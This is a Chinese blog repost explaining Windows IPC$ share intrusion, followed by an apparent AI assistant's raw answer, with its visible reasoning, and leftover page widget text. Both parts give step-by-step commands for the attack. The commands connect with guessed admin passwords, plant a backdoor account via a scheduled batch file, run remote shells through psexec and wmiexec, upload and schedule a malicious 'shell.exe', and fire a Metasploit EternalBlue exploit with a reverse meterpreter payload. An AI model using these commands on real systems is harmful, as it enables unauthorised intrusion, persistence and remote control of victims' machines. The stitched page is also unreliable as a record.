IPC$入侵大全

0x01  ipc$的定义

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

0x02  ipc$与空连接,139,445端口,默认共享的关系

ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

0x03  ipc$入侵实战

 

1.实验环境:

.攻击机:win7x64   IP:192.168.1.101

靶机:  win2003   ip:192.168.1.108

 

2.通过扫描器扫描IPC$弱口令连接:

这里推荐大家用ntscan或者溯雪和x-scan,porscan等扫描器

 

3.通过net  use  建立一个非空连接:

连接域backlion的ipc$:

net  use  \\192.168.1.108\c$  “12345@12345qw” /user:backlion\administrator

net use  \\192.168.1.108\c$   123456   /user:administrator  //建立的非空连接

或者

net  use  \\192.168.1.108\c$  " 123456"  /user:administrator  //建立的非空连接

net  use \\192.168.1.108\c$   ""     /user:administrator  //空连接,无密码

 

4.这里准备上传一个建立bk账号的批处理:

d:\user.bat  文件内容为:net user  bk   bk123   /add

 

 

注:这里也可以上传MSF下生成的exe,上传到靶机上执行,然后反弹出shell,更能很好地操作。

 

5.通过copy命令上传本地攻击机的批处理文件到目标靶机的c$上,也就是靶机的c:\

copy    user.bat     \\192.168.1.108\c$

 

注意:文件下载

copy  \\192.168.1.108\c$\user.bat  user.bat

6.查看目标靶机的时间:

net time  \\192.168.1.108

 

7.通过at命令在特定时间执行批处理文件:

at  \\192.168.1.108  12:13:00   c:\user.bat

 

6.在目标靶机上发现账号已成功添加执行:

 

8.其他命令:

将目标共享建立一个映射Z盘:

net use z: \\192.168.1.108\c$

 

查看已建立的会话:

net use 

 

删除会话连接:

 

9.通过psexec工具进行会话连接执行

psexec.exe  \\192.168.1.108   cmd  //前提是需要建立一个空连接或者非空连接

 

psexec.exe  \\192.168.1.108   cmd  -u  administrator   -p  123456  //不需要建立空连接

 

然后就可以在目标靶机上任意执行命令:

 

10.通过wmiexec.vbs进行远程会话执行:

csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

 

然后执行一些系统命令:

 

 

0x04  ipc$连接失败的原因


以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因: 
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 
错误号51,Windows 无法找到网络路径 : 网络有问题; 
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 
错误号1326,未知的用户名或错误密码 : 原因很明显了; 
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况) 
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验

 

转载于:https://www.cnblogs.com/backlion/p/7401609.html

<think>好的,我需要帮助用户了解如何通过IPC$进行主机入侵复现,主要用于安全测试或渗透测试的学习。首先,我得回顾一下用户提供的引用内容,确保信息准确。 根据引用[1],IPC$利用的条件是目标开启139或445端口,并且已有凭证。引用[3]提到了工作组和域环境下的基本命令,比如使用net use建立连接。引用[4]则提到了如何上传文件和通过at命令执行任务。而引用[2]中的WannaCry案例可能与漏洞利用有关,比如MS17-010。 接下来,我需要整理步骤,确保符合系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题。同时,引用标记要自然添加。 首先,复现步骤应包括环境准备、建立连接、文件上传、执行命令、痕迹清理。每个步骤需要详细说明命令和注意事项。例如,在建立连接时使用net use命令,并引用[3]。上传文件部分引用[4]的copy命令和at计划任务。还要提到漏洞利用如MS17-010,引用[2]。 然后,注意事项里强调合法授权和风险,避免用户误用。防御措施部分需要引用[2]中的方法,比如关闭端口和打补丁。 生成的相关问题需要涵盖检测方法、漏洞利用、防御措施和与其他协议的区别,这样用户能全面了解。 最后,检查格式是否正确,确保没有使用任何Markdown,引用标记正确,语言口语化,结构清晰。</think>### IPC$主机入侵复现方法 IPC$是Windows系统用于共享命名管道的机制,常被用于横向渗透测试。以下是基于参考内容的复现流程及注意事项: --- #### **复现条件** 1. 目标主机开启$139$或$445$端口(可通过`nmap`扫描验证)[^1] 2. 已获取目标主机的用户名和密码(或NTLM Hash)[^3] --- #### **复现步骤** 1. **建立IPC$连接** ```bash # 工作组环境 net use \\目标IP\ipc$ "密码" /user:"用户名" # 域环境 net use \\目标IP\ipc$ "密码" /user:"域名\用户名" ``` 若成功返回“命令成功完成”,则连接建立[^3]。 2. **文件上传与执行** - **上传恶意文件** ```bash copy shell.exe \\目标IP\admin$ ``` 将本地文件`shell.exe`复制到目标系统的`C:\Windows`目录(需管理员权限)[^4]。 - **计划任务执行** ```bash net time \\目标IP # 查看目标系统时间 at \\目标IP 12:30 C:\Windows\shell.exe ``` 通过定时任务触发恶意程序(需目标系统启用`Task Scheduler`服务)[^4]。 3. **漏洞利用(可选)** 若目标存在漏洞(如$MS17-010$),可通过Metasploit框架直接反弹Shell: ```bash use exploit/windows/smb/ms17_010_eternalblue set RHOST 目标IP set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit ``` 此步骤需结合漏洞扫描工具验证漏洞存在性[^2]。 4. **清理痕迹** ```bash net use \\目标IP\ipc$ /del # 删除IPC$连接 ``` --- #### **注意事项** 1. **合法性**:仅在授权范围内进行测试,避免触犯法律。 2. **端口限制**:现代系统可能默认关闭$445$端口或启用防火墙。 3. **防御措施**: - 关闭不必要的SMB服务 - 安装系统补丁(如$KB4013389$修复$MS17-010$) - 启用强密码策略 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值